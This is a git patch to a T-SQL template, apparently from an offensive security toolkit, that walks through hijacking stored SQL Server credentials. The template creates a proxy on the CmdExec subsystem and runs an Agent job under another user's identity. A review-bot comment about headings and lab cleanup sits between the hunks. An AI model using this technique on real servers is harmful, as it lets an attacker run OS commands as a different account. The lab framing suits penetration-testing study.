From d5250ebd5e5f8361692be97795866b5e851af061 Mon Sep 17 00:00:00 2001
From: Scott Sutherland
Date: Tue, 20 Aug 2024 12:39:55 -0500
Subject: [PATCH] Update Get-Credentials-Hijack.tsql
---
templates/tsql/Get-Credentials-Hijack.tsql | 78 ++++++++++++++++------
1 file changed, 58 insertions(+), 20 deletions(-)
diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql
index d68cbea..2b1bb9d 100644
--- a/templates/tsql/Get-Credentials-Hijack.tsql
+++ b/templates/tsql/Get-Credentials-Hijack.tsql
@@ -1,20 +1,59 @@ -- Tested and worked - SQL Server v2014 instance - --------------------------- --- Create a new credential named 'MyCredential' - for testing --------------------------- +-- Author: Scott Sutherland @_nullbind (Twitter) + +-- ################################# +-- LAB SETUP SUMMARY +--- ################################# +-- 1. Install local instance +-- 2. Create local OS user named 'testuser'. +-- 3. Log into SQL Server instance as a sysadmin and create credential. + +-- ################################# +-- LAB SETUP SUMMARY +-- ################################# +-- 1. Log into the SQL Server instance as a sysadmin. +-- 2. List credentials. +-- 3. List proxy accounts. +-- 3. Create proxy account and assign privileges to it (if proxy account doesnt exist for credential already). List proxy accounts to confirm addition. +-- 4. Create Agent job that uses the proxy account. +-- 5. Execute a PowerShell, VBscript, JScript, or CMDEXEC Agent Job. These will create processes on the system in that user context. +-- 6. Confirm execution by reviewing history. 
+ +--- ################################# +-- Walk Through Below +--- ################################# + +---------------------------------------------------- +-- Create a new credential named 'MyCredential' for testing (for lab only) +---------------------------------------------------- CREATE CREDENTIAL [MyCredential] -WITH IDENTITY = 'machinename\osusername', +WITH IDENTITY = 'yourcomputernamehere\testuser', SECRET = 'P@ssw0rd!'; --------------------------- --- Get list of all credentials --------------------------- +---------------------------------------------------- +-- Get a list of all credentials +---------------------------------------------------- select * from sys.credentials --------------------------- --- Create a Proxy Using the Target Credential --------------------------- +---------------------------------------------------- +-- Get a list proxies +---------------------------------------------------- +USE msdb; +GO + +SELECT + proxy_id, + name AS proxy_name, + credential_id, + enabled +FROM + dbo.sysproxies; +GO + +---------------------------------------------------- +-- Create a Proxy Using the Target Credential (if needed) +---------------------------------------------------- + USE msdb; GO @@ -26,10 +65,9 @@ EXEC sp_grant_proxy_to_subsystem @proxy_name = N'MyCredentialProxy', @subsystem_id = 3; -- 3 represents the Operating System (CmdExec) subsystem --------------------------- --- List Proxies --------------------------- - +---------------------------------------------------- +-- Get a list proxies - again +---------------------------------------------------- USE msdb; GO @@ -42,9 +80,9 @@ FROM dbo.sysproxies; GO --------------------------- +---------------------------------------------------- -- Create the SQL Server Agent Job Configured to use the Proxy Account --------------------------- +---------------------------------------------------- USE msdb; GO 
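Review bot: The second summary block added in the `@@ -1,20 +1,59 @@` hunk is headed `-- LAB SETUP SUMMARY` again, although its steps describe the walk-through rather than the lab setup, and two of its steps are numbered `3.`; I would retitle it `-- WALK THROUGH SUMMARY` and renumber the list 1 to 7. The new heading `-- Get a list proxies` (and `-- Get a list proxies - again` in the `@@ -26,10 +65,9 @@` hunk) is missing "of", and two banner lines start with `--- ####` where the others use `-- ####`. Step 5 lists PowerShell, VBscript, JScript and CMDEXEC, while the only grant visible in the following hunk's context is `@subsystem_id = 3` (CmdExec), so the summary should name the subsystem this template actually configures. The lab steps create a credential with a literal password and no teardown is visible in these hunks; if the rest of the file has none, a closing "lab cleanup" section that removes the job, the proxy and the credential would keep test instances from retaining them.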
@@ -76,10 +114,11 @@ EXEC sp_add_jobserver @job_name = N'WhoAmIJob', @server_name = N'(LOCAL)'; -- The server where the job will run --------------------------- +---------------------------------------------------- -- Get List of Proxy Account used by Agent Jobs -- Show job, step, proxy, cred, and identity --------------------------- +---------------------------------------------------- + USE msdb; GO @@ -103,7 +142,6 @@ WHERE ORDER BY jobs.name, steps.step_id; - -------------------------- -- Execute the Job --------------------------